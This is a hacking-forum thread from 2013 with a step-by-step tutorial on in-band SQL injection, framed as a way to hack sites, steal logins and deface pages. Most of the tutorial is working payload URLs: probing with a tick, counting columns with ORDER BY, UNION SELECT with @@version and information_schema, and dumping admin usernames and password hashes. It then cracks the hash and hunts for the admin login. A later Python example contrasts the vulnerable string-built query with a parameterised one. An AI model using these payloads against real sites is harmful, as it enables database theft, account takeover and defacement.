How to: Inband SQLi


Post by -Ninjex- on Sun Feb 24, 2013 6:44 am

Okay, let me get this part out of the way...
You are you, and you know what is legal and illegal. I am creating this post for information purposes only. Any actions brought forth by the information held within this post, is purely the fault of the user, and not mine.

Now to the good junk...
How to hack a website? How to dump a database? How to steal logins? How to deface a site?

Well, the answer to all those questions can be solved with SQLi
In this post I will not be talking about how SQL works, that is something you need to/should want to go do on your own spare time. I will however be covering some basic how to's on SQLi.
There are three classes in which SQLi can be grouped into:

    1.) Inband - Data is extracted using the same channel that is used to inject the SQL code and the data is presented directly in the application web page.

    2.) Out of Band - Data is retrieved using a different channel i.e. an e-mail

    3.) Inferential - There is no actual transfer of data. You can create true and false statements to the server, and observe the behaviour of the website/DB Server to determine if the query is true.

In this how to, I will be covering Inband SQLi. (I will cover blind/Inferential in another post in the future)
(For the remainder of this tutorial I will be using "http://ninjex/page.asp?id=1" as an example of a vuln site)

Next up I want to make four things clear in which you really need to know when performing a SQLi attack. That is the differences between:

    1.) Error - You ask the Database a question, and look for useful information that it may send back.
    http://ninjex/page.asp?id=1 or 1=convert(int,(USER))--

    The database may send back something like:
    Syntax error converting the nvarchar value '[Ninjected]' to a column of data type int.

    2.) Union - Union is used to add two or more select SQL statements into one result.

    3.) Blind - Asking the DB a true/false question while watching how the page reacts to the question. You may send time questions to the server such as telling it:
    If the table name is 2 characters in length, respond in 5 seconds -- If you get an immediate response, you know it is false. You do this as many times needed to determine your table/column names, etc..

    4.) ' - The single quote, also referred to as a tick, is used to test for an SQLi vuln. This is usually appended to the end of a URL.
For a website to be vulnerable via SQLi from the URL, it usually looks similar to:
http://ninjex/page.asp?id=1
http://ninjex/page.php?user=1
http://ninjex/news.php?id=853
etc

As you can see, you are really just looking for "?something=value" where something is an extension, and value is a number/string value.
To test the URL for an SQLi vuln, we need to use our tick as described above such as:
http://ninjex/page.asp?id=1'


Now, there are a few things which could happen at this point:

1.) SQLi Error - The website will display the SQL error straight to the webpage screen you are viewing.

2.) Page Redirect - The website will redirect you to another web page.

3.) Nothing - <---- Just like it says, nothing may happen at all. If that's the case, I don't know how to inject it.


Alright, so if you get a SQLi error, it means we can go ahead and use Inband SQLi. The first thing we want to do is to figure out the amount of columns that are associated. To do this, we use a code similar to the following:
http://ninjex/page.asp?id=1 order by 1--

The code above basically asks the Database if it has 1 table, if it does, the page will appear normal in front of you without any errors being produced. If that is the case, you need to keep going until you get an error, i.e:

http://ninjex/page.asp?id=1 order by 1--
(No error)
http://ninjex/page.asp?id=1 order by 10--
(Error -- You now know that it has at least 1, but less than 10 tables)
http://ninjex/page.asp?id=1 order by 5 --
(Error -- You now know it has at least 1, but less than 5 tables)
http://ninjex/page.asp?id=1 order by 4 --
(No error -- You know it has 4 tables, since 5 produced an error, and 4 did not)

So next, we need to figure out which columns are vulnerable for us to exploit, to do this we need to remember the total number of columns, as well as use our union statement in a syntax like so:
http://ninjex/page.asp?id=1 union all select 1,2,3,4--

or (I tend to always turn the value after = to null. This makes it easier to read the vuln columns, and sometimes it will not produce on the screen the vuln columns with a non null value)
http://ninjex/page.asp?id=null union all select 1,2,3,4--


This will output some numbers onto the web page. These numbers can be anywhere, but keep note of one of them once you find it. Let's hypothetically say that I ran:
http://ninjex/page.asp?id=null union all select 1,2,3,4--

and it showed up the numbers 2 and 4 on my web page. Either one of those columns is exploitable. So next, we need to go ahead and grab the version of the DB (I will only cover how to exploit 5.0+ Databases due to its much more simplistic nature). To do this, we need to use the command @@version on the vuln table like so:
http://ninjex/page.asp?id=null union all select 1,@@version,3,4--

This should give us the version number where the number 2 was previously at on our screen. If it is 5.0+, we can continue, if it is 4.0- I suggest moving to another site, as it is much harder yet not impossible to exploit.

So next, we need to figure out the names of our tables, to do this we will use group_concat() on the vuln column, as well as a few other commands to grab information from. The syntax will look like the following:
http://ninjex/page.asp?id=null union all select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()


Now let's hypothetically say that on the screen, where the number 2 used to be, now shows our list of tables with the names of: admin, user, login, email

So next we need to choose which table we want to exploit. In most cases, we would want either the admin or the login. So let's exploit the admin table, and find out what columns are inside of it.
Here, we will be using hex encoding for the table name. We need our table name converted to hex; to do this use either software (I use hackbar addon for firefox) or use a website such as: http://encodertool.com/hexadecimal
Now, we see that admin converted to hex is "61646d696e". We just need to add a 0x to the front of that now to use it, so "0x61646d696e" will be what we use for the table name.
Also, as a side note, we will also be using "0x3a" which is hex for a semicolon ":" this will be used to separate the dump from the columns later on.

So, now onto the good stuff of getting our column names inside of our admin table. To do that we use the following syntax:
http://ninjex/page.asp?id=null union all select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=0x61646d696e


Now let's hypothetically say the columns inside the admin table are: username, password, and id. We would at this point want to dump the details from inside the username and password column, so we use the following syntax to do so:
http://ninjex/page.asp?id=null union all select 1,group_concat(username,0x3a,password),3,4 from admin


Let's now say that it hypothetically printed out: "Ninjex:e00cf25ad42683b3df678c61f42c6bda"
Usually the password is in MD5 format, so after finding the original value of the hash above, we see the password is "admin1"

Lastly, you can crawl the website or use an admin page finder such as http://y-shahinzadeh.ir/af/index.php to try and figure out where to login with the admin credentials.

Enjoy,
- -Ninjex-

-- Sun Feb 24, 2013 6:45 am --

Note, that if wanted I can create videos showing how this works.

:twisted:
Last edited by -Ninjex- on Sun Feb 24, 2013 1:20 pm, edited 1 time in total.
If you're not willing to learn, no one can help you. If you're determined to learn, no one can stop you.⠠⠵
The absence of evidence is not evidence of absence.
I can explain it for you, but I can't understand it for you.
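The mechanism the post relies on, as an added example that is not part of the original thread: a lookup that concatenates the ?id= value into its SQL (so the tick, the order-by probe and the union from the post all take effect) beside a parameterised lookup that treats the same input as a plain value. Python's standard-library sqlite3 stands in for the ASP/PHP page; the table, rows and column count are constructed assumptions.

```python
import sqlite3

# Constructed in-memory stand-in for the tutorial's "page.asp?id=1" backend.
# Schema and rows are assumptions for this example, not taken from any real site.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE page(id INTEGER, title TEXT, body TEXT, author TEXT);
        INSERT INTO page VALUES (1, 'Welcome', 'First post', 'ninjex');
    """)
    return con

# The flaw the thread describes: the ?id= value is pasted into the SQL text, so
# anything after the number is executed as SQL. "order by 5" fails here because
# this SELECT returns four columns (LoGiCaL__'s point: the probe counts the
# columns of the query it lands in, not the tables in the database).
def vulnerable_lookup(con, raw_id):
    sql = "SELECT id, title, body, author FROM page WHERE id=" + raw_id
    try:
        return con.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        return "error: " + str(exc)   # the "SQLi Error" outcome from the post

# The fix: a bound parameter is always a value, never SQL. The same inputs can
# no longer change the query's shape or raise a database error; a non-numeric
# string simply matches no row.
def safe_lookup(con, raw_id):
    sql = "SELECT id, title, body, author FROM page WHERE id=?"
    return con.execute(sql, (raw_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1'", "1 order by 4--", "1 order by 5--",
                  "null union all select 1,2,3,4--"):
        print(f"{value!r:36} vulnerable={vulnerable_lookup(db, value)!r}")
        print(f"{'':36} safe={safe_lookup(db, value)!r}")
```

The vulnerable function reproduces all three outcomes the post lists for the tick (error, changed result, nothing), while the parameterised one returns the row for "1" and an empty result for every probe.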


Re: How to: Inband SQLi

Post by DrRoach on Sun Feb 24, 2013 12:40 pm

Thanks a lot for this can't wait to read it when I get some time


Re: How to: Inband SQLi

Post by KthProg on Sun Feb 24, 2013 12:50 pm

Wow, that is frigging awesome.
Yes, please post a video lol


Re: How to: Inband SQLi

Post by LoGiCaL__ on Sun Feb 24, 2013 12:55 pm

-Ninjex- wrote:Alright, so if you get a SQLi error, it means we can go ahead and use Inband SQLi. The first thing we want to do is to figure out the amount of tables that Database has. To do this, we use a code similar to the following:
http://ninjex/page.asp?id=1 order by 1--

The code above basically asks the Database if it has 1 table, if it does, the page will appear normal in front of you without any errors being produced. If that is the case, you need to keep going until you get an error, i.e:

http://ninjex/page.asp?id=1 order by 1--
(No error)
http://ninjex/page.asp?id=1 order by 10--
(Error -- You now know that it has at least 1, but less than 10 tables)
http://ninjex/page.asp?id=1 order by 5 --
(Error -- You now know it has at least 1, but less than 5 tables)
http://ninjex/page.asp?id=1 order by 4 --
(No error -- You know it has 4 tables, since 5 produced an error, and 4 did not)
:twisted:


Nice write up. However, and please correct me if I'm wrong but, wouldn't the above code just let you know how many columns are in the table that id=1 is being used in and not the number of tables in the database? I only say this because order by 1 would order by the first column, order 2 would order by the second column and so on. So it would inject into the sql whatever code was written which uses id=1 for that php page and append order by at the end of the query. You would keep increasing the number to find out how many columns are in that table.


Re: How to: Inband SQLi

Post by -Ninjex- on Sun Feb 24, 2013 1:16 pm

LoGiCaL__ wrote:Nice write up. However, and please correct me if I'm wrong but, wouldn't the above code just let you know how many columns are in the table that id=1 is being used in and not the number of tables in the database? I only say this because order by 1 would order by the first column, order 2 would order by the second column and so on. So it would inject into the sql whatever code was written which uses id=1 for that php page and append order by at the end of the query. You would keep increasing the number to find out how many columns are in that table.


Correct, I will go through and fix the table to column. :D


Re: How to: Inband SQLi

Post by cyber-maniac on Mon Feb 25, 2013 1:07 pm

Nice, thanks for that :)
Pretty thorough too


Re: How to: Inband SQLi

Post by DrRoach on Wed Mar 20, 2013 5:56 pm

Hey Ninjex great post and I really hope you decide to post a video !! I was wondering if you'd post a link to a website to explain why this weakness works? I enjoy knowing how and why things work just in case something strange pops up or I want to try and explain to someone else :P Thanks once again great post.


Re: How to: Inband SQLi

Post by limdis on Sat Mar 23, 2013 1:02 pm

Moar videos
"The quieter you become, the more you are able to hear..."
"Drink all the booze, hack all the things."


Re: How to: Inband SQLi

Post by -Ninjex- on Sat Mar 23, 2013 2:36 pm

limdis wrote:Moar videos


Alright alright alright... I will make some videos soon -.-

As long as you guys promise not to freak out about my crazy cool Linux desktop that looks like cyber war-fare.


